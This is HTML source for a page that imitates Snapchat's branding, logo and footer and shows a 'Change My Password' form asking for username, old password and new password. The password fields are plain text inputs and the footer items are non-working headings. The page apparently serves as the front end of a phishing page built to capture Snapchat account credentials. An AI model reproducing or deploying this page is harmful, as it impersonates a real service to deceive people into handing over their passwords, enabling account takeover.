<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Snapchat - The fastest way to share a moment!</title>
    <link rel="icon" href="/images/Snapchat-Transparent-Black-and-White-1024x1008.png" type="image/x-icon">
    <link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Kumbh+Sans:wght@400;700&family=Nunito:wght@300;400;500;600&family=Public+Sans:wght@300;400;700&family=Roboto:wght@300;400;500;700&family=Rubik:wght@400;500&family=Source+Sans+Pro:ital,wght@0,200;0,300;0,400;0,600;0,700;0,900;1,200;1,300;1,400;1,600;1,700;1,900&family=Urbanist:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet">

<style>





    * {
    margin: 0;
    padding: 0;
    font-family: "Nunito";
    }

    body {
    box-sizing: border-box;
    }


    .landing-page {
    height: 95vh;
    width: 100%;
    display: flex;
    justify-content: center;
    align-items: center;
    background-color: #F2F2F2;
    flex-direction: column;
    }

    .content {
        width: 400px;
        height: 70%;
        background-color: white;
        border-radius: 5px;
        -webkit-box-shadow: 0px 0px 7px 0px rgba(120,120,120,1);
        -moz-box-shadow: 0px 0px 7px 0px rgba(120,120,120,1);
        box-shadow: 0px 0px 7px 0px rgba(120,120,120,1);
        display: flex;
        justify-content: space-evenly;
        align-items: center;
        flex-direction: column;
        position: relative;
    }

    .header {
        font-weight: 600;
    }

    p {
        width: 80%;
        text-align: center;
        color: #656B73;
        font-weight: 600;
        font-size: 14px;
    }

    form {
        display: flex;
        justify-content: space-evenly;
        flex-direction: column;
        align-items: center;
    }
    /* .upper-content {
        flex: 1;
        display: flex;
        justify-content: center;
        align-items: center;
        flex-direction: column;
    } */

    input {
        width:350px;
        height: 50px;
        margin: auto;
        background-color: #F7F7F7;
        color: black;
        border-radius: 5px;
        font-size: 18px;
        border: 1px white;
        transition: all ease .2s;
        border-style: solid;
        margin-top: 30px;
        padding-left: 10px;
    }

    input:hover {
        border-color: rgb(223, 223, 0);
    }
    input:active {
        border: none;
        outline: none;
    }

    ::placeholder {
        color: #656B73;
    }

    button {
        padding: 10px;
        width: 90px;
        border-radius: 20px;
        border: none;
        background-color: #FFFC00;
        font-weight: 600;
        margin-top: 30px;
        cursor: pointer;
        transition: all ease .2s;
    }

    button:hover {
        -webkit-box-shadow: 0px 0px 7px 0px rgba(120,120,120,1);
-moz-box-shadow: 0px 0px 7px 0px rgba(120,120,120,1);
box-shadow: 0px 0px 7px 0px rgba(120,120,120,1);
    }

    .footer {
        width: 100%;
        height: 20vh;
        display: flex;
        justify-content: space-evenly;
        align-items: center;
    }

    .footer-header {
        color: black;
        font-size: 16px;
        cursor: pointer;
    }

    .footer-text {
        color: #656B73;
        font-size: 16px;
        cursor: pointer;

    }

    .logo {
        
        height: 50px;
    }

    

</style>

</head>
<body>
 
    <section class="landing-page">
    <div class="content">
    <img class="logo" src="/images/Snapchat-Transparent-Black-and-White-1024x1008.png"/>
    <h1 class="header">Change My Password</h1>
    <p>In order to best protect your account, please select a password that is at least 8 characters long and contains a combination of uppercase and lowercase letters, numbers and/or symbols.</p>
    
    <form action="" method="post" action="/">
        <div>
            <input type="text" name="username" placeholder="Username" required>

        </div>
        <div>
            <input type="text" name="oldPassword" placeholder="Old Password" required>
        </div>
        <div>
            <input type="text" name="newPassword" placeholder="New Password" required>
        </div>
        <div>
            <input name="new-password" type="newPassword" placeholder="Comfirm New Password" required></input>
        </div>
        <button name="submit">Save</button>
        
    </form>
</div>
</section>

<section class="footer">
    <div>
        <strong><h1 class="footer-header">Company</h1></strong>
        <h1 class="footer-text">Snap Inc.</h1>
        <h1 class="footer-text">Careers</h1>
        <h1 class="footer-text">News</h1>
    </div>

    <div>
        <strong><h1 class="footer-header">Community</h1></strong>
        <h1 class="footer-text">Support</h1>
        <h1 class="footer-text">Community Guidelines</h1>
        <h1 class="footer-text">Safety Center</h1>
    </div>

    <div>
        <strong><h1 class="footer-header">Advertising</h1></strong>
        <h1 class="footer-text">Buy Ads</h1>
        <h1 class="footer-text">Advertising Policies</h1>
        <h1 class="footer-text">Political Ads Library</h1>
        <h1 class="footer-text">Brand Guidelines</h1>
        <h1 class="footer-text">Promotions Rules</h1>
    </div>

    <div>
        <strong><h1 class="footer-header">Legal</h1></strong>
        <h1 class="footer-text">Privacy Center</h1>
        <h1 class="footer-text">Cookie Policy</h1>
        <h1 class="footer-text">Report Infrigement</h1>
        <h1 class="footer-text">Custom Creative Tools Terms</h1>
        <h1 class="footer-text">Community Geofilter Terms</h1>
        <h1 class="footer-text">Lens Studio Terms</h1>
    </div>
</section>
</body>
</html>